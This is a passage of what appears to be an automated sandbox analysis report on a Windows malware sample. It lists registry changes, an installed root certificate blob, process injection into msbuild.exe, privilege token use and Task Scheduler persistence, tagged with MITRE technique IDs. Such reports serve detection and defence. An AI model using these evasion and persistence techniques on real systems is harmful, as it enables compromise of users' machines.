Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time"	LdUE2a32dE3B01kT9zDrukhG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-621 = "Korea Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	LdUE2a32dE3B01kT9zDrukhG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-572 = "China Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2772 = "Omsk Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time"	LdUE2a32dE3B01kT9zDrukhG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time"	LdUE2a32dE3B01kT9zDrukhG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1501 = "Turkey Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-791 = "SA Western Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	LdUE2a32dE3B01kT9zDrukhG.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

Processes:

pkFqx95ygiXcp9uKNIAU6KGe.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4	pkFqx95ygiXcp9uKNIAU6KGe.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	pkFqx95ygiXcp9uKNIAU6KGe.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	pkFqx95ygiXcp9uKNIAU6KGe.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exepowershell.exepowershell.exeLdUE2a32dE3B01kT9zDrukhG.exeNQoLPvoFTUXvp6rQ79vpjiOS.exepowershell.exepowershell.exeLdUE2a32dE3B01kT9zDrukhG.exeNQoLPvoFTUXvp6rQ79vpjiOS.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeinjector.exepowershell.exe

pid	process
2156	d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe
3936	powershell.exe
3936	powershell.exe
4936	powershell.exe
4936	powershell.exe
4936	powershell.exe
1756	LdUE2a32dE3B01kT9zDrukhG.exe
1756	LdUE2a32dE3B01kT9zDrukhG.exe
2164	NQoLPvoFTUXvp6rQ79vpjiOS.exe
2164	NQoLPvoFTUXvp6rQ79vpjiOS.exe
748	powershell.exe
748	powershell.exe
2108	powershell.exe
2108	powershell.exe
2108	powershell.exe
748	powershell.exe
4364	LdUE2a32dE3B01kT9zDrukhG.exe
4364	LdUE2a32dE3B01kT9zDrukhG.exe
4364	LdUE2a32dE3B01kT9zDrukhG.exe
4364	LdUE2a32dE3B01kT9zDrukhG.exe
4364	LdUE2a32dE3B01kT9zDrukhG.exe
4364	LdUE2a32dE3B01kT9zDrukhG.exe
4364	LdUE2a32dE3B01kT9zDrukhG.exe
4364	LdUE2a32dE3B01kT9zDrukhG.exe
4364	LdUE2a32dE3B01kT9zDrukhG.exe
4364	LdUE2a32dE3B01kT9zDrukhG.exe
4804	NQoLPvoFTUXvp6rQ79vpjiOS.exe
4804	NQoLPvoFTUXvp6rQ79vpjiOS.exe
4804	NQoLPvoFTUXvp6rQ79vpjiOS.exe
4804	NQoLPvoFTUXvp6rQ79vpjiOS.exe
4804	NQoLPvoFTUXvp6rQ79vpjiOS.exe
4804	NQoLPvoFTUXvp6rQ79vpjiOS.exe
4804	NQoLPvoFTUXvp6rQ79vpjiOS.exe
4804	NQoLPvoFTUXvp6rQ79vpjiOS.exe
4804	NQoLPvoFTUXvp6rQ79vpjiOS.exe
4804	NQoLPvoFTUXvp6rQ79vpjiOS.exe
3376	powershell.exe
3376	powershell.exe
3596	powershell.exe
3596	powershell.exe
3596	powershell.exe
3376	powershell.exe
216	powershell.exe
216	powershell.exe
4980	powershell.exe
4980	powershell.exe
216	powershell.exe
4980	powershell.exe
2560	powershell.exe
2560	powershell.exe
2560	powershell.exe
3596	powershell.exe
3596	powershell.exe
3596	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
1284	injector.exe
1284	injector.exe
1284	injector.exe
1284	injector.exe
1284	injector.exe
1284	injector.exe
4296	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exemsbuild.exepowershell.exepowershell.exeLdUE2a32dE3B01kT9zDrukhG.exeNQoLPvoFTUXvp6rQ79vpjiOS.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execsrss.exepowershell.exeWMIC.exeSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exesc.exe

description	pid	process
Token: SeDebugPrivilege	2156	d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe
Token: SeDebugPrivilege	2468	msbuild.exe
Token: SeDebugPrivilege	3936	powershell.exe
Token: SeDebugPrivilege	4936	powershell.exe
Token: SeDebugPrivilege	1756	LdUE2a32dE3B01kT9zDrukhG.exe
Token: SeImpersonatePrivilege	1756	LdUE2a32dE3B01kT9zDrukhG.exe
Token: SeDebugPrivilege	2164	NQoLPvoFTUXvp6rQ79vpjiOS.exe
Token: SeImpersonatePrivilege	2164	NQoLPvoFTUXvp6rQ79vpjiOS.exe
Token: SeDebugPrivilege	2108	powershell.exe
Token: SeDebugPrivilege	748	powershell.exe
Token: SeDebugPrivilege	3596	powershell.exe
Token: SeDebugPrivilege	3376	powershell.exe
Token: SeDebugPrivilege	216	powershell.exe
Token: SeDebugPrivilege	4980	powershell.exe
Token: SeDebugPrivilege	2560	powershell.exe
Token: SeDebugPrivilege	3596	powershell.exe
Token: SeDebugPrivilege	3284	powershell.exe
Token: SeSystemEnvironmentPrivilege	2604	csrss.exe
Token: SeDebugPrivilege	4296	powershell.exe
Token: SeIncreaseQuotaPrivilege	3512	WMIC.exe
Token: SeSecurityPrivilege	3512	WMIC.exe
Token: SeTakeOwnershipPrivilege	3512	WMIC.exe
Token: SeLoadDriverPrivilege	3512	WMIC.exe
Token: SeSystemProfilePrivilege	3512	WMIC.exe
Token: SeSystemtimePrivilege	3512	WMIC.exe
Token: SeProfSingleProcessPrivilege	3512	WMIC.exe
Token: SeIncBasePriorityPrivilege	3512	WMIC.exe
Token: SeCreatePagefilePrivilege	3512	WMIC.exe
Token: SeBackupPrivilege	3512	WMIC.exe
Token: SeRestorePrivilege	3512	WMIC.exe
Token: SeShutdownPrivilege	3512	WMIC.exe
Token: SeDebugPrivilege	3512	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3512	WMIC.exe
Token: SeRemoteShutdownPrivilege	3512	WMIC.exe
Token: SeUndockPrivilege	3512	WMIC.exe
Token: SeManageVolumePrivilege	3512	WMIC.exe
Token: 33	3512	WMIC.exe
Token: 34	3512	WMIC.exe
Token: 35	3512	WMIC.exe
Token: 36	3512	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3512	WMIC.exe
Token: SeSecurityPrivilege	3512	WMIC.exe
Token: SeTakeOwnershipPrivilege	3512	WMIC.exe
Token: SeLoadDriverPrivilege	3512	WMIC.exe
Token: SeSystemProfilePrivilege	3512	WMIC.exe
Token: SeSystemtimePrivilege	3512	WMIC.exe
Token: SeProfSingleProcessPrivilege	3512	WMIC.exe
Token: SeIncBasePriorityPrivilege	3512	WMIC.exe
Token: SeCreatePagefilePrivilege	3512	WMIC.exe
Token: SeBackupPrivilege	3512	WMIC.exe
Token: SeRestorePrivilege	3512	WMIC.exe
Token: SeShutdownPrivilege	3512	WMIC.exe
Token: SeDebugPrivilege	3512	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3512	WMIC.exe
Token: SeRemoteShutdownPrivilege	3512	WMIC.exe
Token: SeUndockPrivilege	3512	WMIC.exe
Token: SeManageVolumePrivilege	3512	WMIC.exe
Token: 33	3512	WMIC.exe
Token: 34	3512	WMIC.exe
Token: 35	3512	WMIC.exe
Token: 36	3512	WMIC.exe
Token: SeDebugPrivilege	4944	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
Token: SeSecurityPrivilege	4744	sc.exe
Token: SeSecurityPrivilege	4744	sc.exe

Suspicious use of FindShellTrayWindow 7 IoCs

Processes:

ulc.3.exe

pid process

3204 ulc.3.exe
3204 ulc.3.exe
3204 ulc.3.exe
3204 ulc.3.exe
3204 ulc.3.exe
3204 ulc.3.exe
3204 ulc.3.exe
Suspicious use of SendNotifyMessage 7 IoCs

Processes:

ulc.3.exe

pid process

3204 ulc.3.exe
3204 ulc.3.exe
3204 ulc.3.exe
3204 ulc.3.exe
3204 ulc.3.exe
3204 ulc.3.exe
3204 ulc.3.exe

pid	process
3204	ulc.3.exe
3204	ulc.3.exe
3204	ulc.3.exe
3204	ulc.3.exe
3204	ulc.3.exe
3204	ulc.3.exe
3204	ulc.3.exe

pid	process
3204	ulc.3.exe
3204	ulc.3.exe
3204	ulc.3.exe
3204	ulc.3.exe
3204	ulc.3.exe
3204	ulc.3.exe
3204	ulc.3.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exemsbuild.exeLdUE2a32dE3B01kT9zDrukhG.exeNQoLPvoFTUXvp6rQ79vpjiOS.exev1GloRmtlH7A4ZF27q5awSsA.exepkFqx95ygiXcp9uKNIAU6KGe.exepkFqx95ygiXcp9uKNIAU6KGe.exeLdUE2a32dE3B01kT9zDrukhG.exeNQoLPvoFTUXvp6rQ79vpjiOS.execmd.execmd.exe

description	pid	process	target process
PID 2156 wrote to memory of 2468	2156	d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe	msbuild.exe
PID 2156 wrote to memory of 2468	2156	d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe	msbuild.exe
PID 2156 wrote to memory of 2468	2156	d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe	msbuild.exe
PID 2156 wrote to memory of 2468	2156	d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe	msbuild.exe
PID 2156 wrote to memory of 2468	2156	d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe	msbuild.exe
PID 2156 wrote to memory of 2468	2156	d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe	msbuild.exe
PID 2156 wrote to memory of 2468	2156	d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe	msbuild.exe
PID 2156 wrote to memory of 2468	2156	d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe	msbuild.exe
PID 2156 wrote to memory of 220	2156	d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe	msbuild.exe
PID 2156 wrote to memory of 220	2156	d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe	msbuild.exe
PID 2156 wrote to memory of 220	2156	d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe	msbuild.exe
PID 2468 wrote to memory of 768	2468	msbuild.exe	v1GloRmtlH7A4ZF27q5awSsA.exe
PID 2468 wrote to memory of 768	2468	msbuild.exe	v1GloRmtlH7A4ZF27q5awSsA.exe
PID 2468 wrote to memory of 768	2468	msbuild.exe	v1GloRmtlH7A4ZF27q5awSsA.exe
PID 2468 wrote to memory of 4592	2468	msbuild.exe	i5WHEvos3BIMKMpqbk2wODrZ.exe
PID 2468 wrote to memory of 4592	2468	msbuild.exe	i5WHEvos3BIMKMpqbk2wODrZ.exe
PID 2468 wrote to memory of 1756	2468	msbuild.exe	LdUE2a32dE3B01kT9zDrukhG.exe
PID 2468 wrote to memory of 1756	2468	msbuild.exe	LdUE2a32dE3B01kT9zDrukhG.exe
PID 2468 wrote to memory of 1756	2468	msbuild.exe	LdUE2a32dE3B01kT9zDrukhG.exe
PID 2468 wrote to memory of 2164	2468	msbuild.exe	NQoLPvoFTUXvp6rQ79vpjiOS.exe
PID 2468 wrote to memory of 2164	2468	msbuild.exe	NQoLPvoFTUXvp6rQ79vpjiOS.exe
PID 2468 wrote to memory of 2164	2468	msbuild.exe	NQoLPvoFTUXvp6rQ79vpjiOS.exe
PID 1756 wrote to memory of 3936	1756	LdUE2a32dE3B01kT9zDrukhG.exe	Conhost.exe
PID 1756 wrote to memory of 3936	1756	LdUE2a32dE3B01kT9zDrukhG.exe	Conhost.exe
PID 1756 wrote to memory of 3936	1756	LdUE2a32dE3B01kT9zDrukhG.exe	Conhost.exe
PID 2164 wrote to memory of 4936	2164	NQoLPvoFTUXvp6rQ79vpjiOS.exe	powershell.exe
PID 2164 wrote to memory of 4936	2164	NQoLPvoFTUXvp6rQ79vpjiOS.exe	powershell.exe
PID 2164 wrote to memory of 4936	2164	NQoLPvoFTUXvp6rQ79vpjiOS.exe	powershell.exe
PID 768 wrote to memory of 1572	768	v1GloRmtlH7A4ZF27q5awSsA.exe	Conhost.exe
PID 768 wrote to memory of 1572	768	v1GloRmtlH7A4ZF27q5awSsA.exe	Conhost.exe
PID 768 wrote to memory of 1572	768	v1GloRmtlH7A4ZF27q5awSsA.exe	Conhost.exe
PID 2468 wrote to memory of 3208	2468	msbuild.exe	pkFqx95ygiXcp9uKNIAU6KGe.exe
PID 2468 wrote to memory of 3208	2468	msbuild.exe	pkFqx95ygiXcp9uKNIAU6KGe.exe
PID 2468 wrote to memory of 3208	2468	msbuild.exe	pkFqx95ygiXcp9uKNIAU6KGe.exe
PID 3208 wrote to memory of 3748	3208	pkFqx95ygiXcp9uKNIAU6KGe.exe	pkFqx95ygiXcp9uKNIAU6KGe.exe
PID 3208 wrote to memory of 3748	3208	pkFqx95ygiXcp9uKNIAU6KGe.exe	pkFqx95ygiXcp9uKNIAU6KGe.exe
PID 3208 wrote to memory of 3748	3208	pkFqx95ygiXcp9uKNIAU6KGe.exe	pkFqx95ygiXcp9uKNIAU6KGe.exe
PID 3208 wrote to memory of 4504	3208	pkFqx95ygiXcp9uKNIAU6KGe.exe	pkFqx95ygiXcp9uKNIAU6KGe.exe
PID 3208 wrote to memory of 4504	3208	pkFqx95ygiXcp9uKNIAU6KGe.exe	pkFqx95ygiXcp9uKNIAU6KGe.exe
PID 3208 wrote to memory of 4504	3208	pkFqx95ygiXcp9uKNIAU6KGe.exe	pkFqx95ygiXcp9uKNIAU6KGe.exe
PID 3208 wrote to memory of 1164	3208	pkFqx95ygiXcp9uKNIAU6KGe.exe	pkFqx95ygiXcp9uKNIAU6KGe.exe
PID 3208 wrote to memory of 1164	3208	pkFqx95ygiXcp9uKNIAU6KGe.exe	pkFqx95ygiXcp9uKNIAU6KGe.exe
PID 3208 wrote to memory of 1164	3208	pkFqx95ygiXcp9uKNIAU6KGe.exe	pkFqx95ygiXcp9uKNIAU6KGe.exe
PID 1164 wrote to memory of 1996	1164	pkFqx95ygiXcp9uKNIAU6KGe.exe	pkFqx95ygiXcp9uKNIAU6KGe.exe
PID 1164 wrote to memory of 1996	1164	pkFqx95ygiXcp9uKNIAU6KGe.exe	pkFqx95ygiXcp9uKNIAU6KGe.exe
PID 1164 wrote to memory of 1996	1164	pkFqx95ygiXcp9uKNIAU6KGe.exe	pkFqx95ygiXcp9uKNIAU6KGe.exe
PID 4364 wrote to memory of 748	4364	LdUE2a32dE3B01kT9zDrukhG.exe	powershell.exe
PID 4364 wrote to memory of 748	4364	LdUE2a32dE3B01kT9zDrukhG.exe	powershell.exe
PID 4364 wrote to memory of 748	4364	LdUE2a32dE3B01kT9zDrukhG.exe	powershell.exe
PID 4804 wrote to memory of 2108	4804	NQoLPvoFTUXvp6rQ79vpjiOS.exe	powershell.exe
PID 4804 wrote to memory of 2108	4804	NQoLPvoFTUXvp6rQ79vpjiOS.exe	powershell.exe
PID 4804 wrote to memory of 2108	4804	NQoLPvoFTUXvp6rQ79vpjiOS.exe	powershell.exe
PID 4364 wrote to memory of 2672	4364	LdUE2a32dE3B01kT9zDrukhG.exe	Conhost.exe
PID 4364 wrote to memory of 2672	4364	LdUE2a32dE3B01kT9zDrukhG.exe	Conhost.exe
PID 2672 wrote to memory of 2500	2672	cmd.exe	netsh.exe
PID 2672 wrote to memory of 2500	2672	cmd.exe	netsh.exe
PID 4804 wrote to memory of 2484	4804	NQoLPvoFTUXvp6rQ79vpjiOS.exe	cmd.exe
PID 4804 wrote to memory of 2484	4804	NQoLPvoFTUXvp6rQ79vpjiOS.exe	cmd.exe
PID 2484 wrote to memory of 4428	2484	cmd.exe	netsh.exe
PID 2484 wrote to memory of 4428	2484	cmd.exe	netsh.exe
PID 4804 wrote to memory of 3596	4804	NQoLPvoFTUXvp6rQ79vpjiOS.exe	powershell.exe
PID 4804 wrote to memory of 3596	4804	NQoLPvoFTUXvp6rQ79vpjiOS.exe	powershell.exe
PID 4804 wrote to memory of 3596	4804	NQoLPvoFTUXvp6rQ79vpjiOS.exe	powershell.exe
PID 4364 wrote to memory of 3376	4364	LdUE2a32dE3B01kT9zDrukhG.exe	powershell.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe
"C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe"
1⤵
